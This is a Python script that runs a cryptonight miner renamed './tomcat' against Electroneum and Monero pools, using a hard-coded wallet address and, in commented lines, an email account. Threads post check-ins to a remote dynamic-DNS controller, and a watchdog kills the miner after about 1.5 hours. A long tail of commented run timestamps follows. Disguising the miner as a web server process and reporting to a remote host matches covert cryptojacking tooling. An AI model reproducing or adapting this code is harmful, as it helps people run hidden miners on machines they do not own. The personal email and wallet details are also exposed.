import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:40:07.384126
#2018-02-17 16:26:01.438340
#2018-02-17 18:13:06.255530
#2018-02-17 20:01:04.887170
#2018-02-17 21:49:04.905976
#2018-02-17 23:35:09.176242
#2018-02-18 01:24:06.266898
#2018-02-18 03:11:01.216320
#2018-02-18 04:58:07.521006
#2018-02-18 06:52:06.324786
#2018-02-18 08:42:03.880494
#2018-02-18 10:28:01.577881
#2018-02-18 12:14:06.078130
#2018-02-18 13:59:06.623139
#2018-02-18 15:49:07.324172
#2018-02-18 17:39:01.793813
#2018-02-18 19:27:06.722439
#2018-02-18 21:11:05.963191
#2018-02-18 22:58:04.794543
#2018-02-19 00:46:04.267126
#2018-02-19 02:33:07.737263
#2018-02-19 04:19:07.824743
#2018-02-19 06:04:06.381520
#2018-02-19 07:52:05.192948
#2018-02-19 09:43:01.441147
#2018-02-19 11:33:01.595380
#2018-02-19 13:20:04.606019
#2018-02-19 15:08:06.203857
#2018-02-19 16:57:01.739037
#2018-02-19 18:45:08.910175
#2018-02-19 20:35:08.211487
#2018-02-19 22:23:04.150022
#2018-02-20 00:09:01.665120
#2018-02-20 01:57:07.153074
#2018-02-20 03:46:06.440536
#2018-02-20 05:31:07.355241
#2018-02-20 07:15:07.007869
#2018-02-20 09:01:06.423256
#2018-02-20 10:44:04.661120
#2018-02-20 12:31:04.336916
#2018-02-20 14:17:06.108250
#2018-02-20 16:00:06.375471
#2018-02-20 17:46:07.190089
#2018-02-20 19:57:05.705197
#2018-02-20 21:45:10.121072
#2018-02-20 23:26:01.661845
#2018-02-21 01:09:05.473191
#2018-02-21 02:56:08.019857
#2018-02-21 04:44:07.120814
#2018-02-21 06:33:03.977183
#2018-02-21 08:18:06.763174
#2018-02-21 10:04:07.502232
#2018-02-21 11:51:08.660690
#2018-02-21 13:41:08.721162
#2018-02-21 15:24:07.013209
#2018-02-21 17:14:07.034007
#2018-02-21 19:01:08.877208
#2018-02-21 20:50:05.781210
#2018-02-21 22:36:01.597359
#2018-02-22 00:25:06.082835
#2018-02-22 02:13:05.144133
#2018-02-22 03:58:01.631390
#2018-02-22 05:45:08.896248
#2018-02-22 07:32:06.843302
#2018-02-22 09:19:05.541890
#2018-02-22 11:06:05.214311
#2018-02-22 12:54:01.940149
#2018-02-22 14:41:06.960911
#2018-02-22 16:26:10.519177
#2018-02-22 18:13:10.917914
#2018-02-22 20:02:06.631082
#2018-02-22 21:52:02.257424
#2018-02-22 23:38:23.421467
#2018-02-23 01:26:06.954372
#2018-02-23 03:12:05.109164
#2018-02-23 05:01:05.916711
#2018-02-23 06:46:04.993184
#2018-02-23 08:34:07.275703
#2018-02-23 10:47:05.424542
#2018-02-23 12:43:08.371120
#2018-02-23 14:29:04.338062
#2018-02-23 16:20:05.864706
#2018-02-23 18:06:01.790894
#2018-02-23 19:50:08.768909
#2018-02-23 21:35:07.146103
#2018-02-23 23:22:06.868525
#2018-02-24 01:13:01.668829
#2018-02-24 03:05:05.651252
#2018-02-24 04:51:04.513476
#2018-02-24 06:36:07.846818
#2018-02-24 08:25:03.658440
#2018-02-24 10:10:06.079548
#2018-02-24 12:05:06.712078
#2018-02-24 13:52:06.237429
#2018-02-24 15:42:01.388089
#2018-02-24 17:35:06.348729
#2018-02-24 19:21:06.831480
#2018-02-24 21:12:01.639538
#2018-02-24 23:45:06.287015
#2018-02-25 03:36:06.391445
#2018-02-25 07:14:01.844084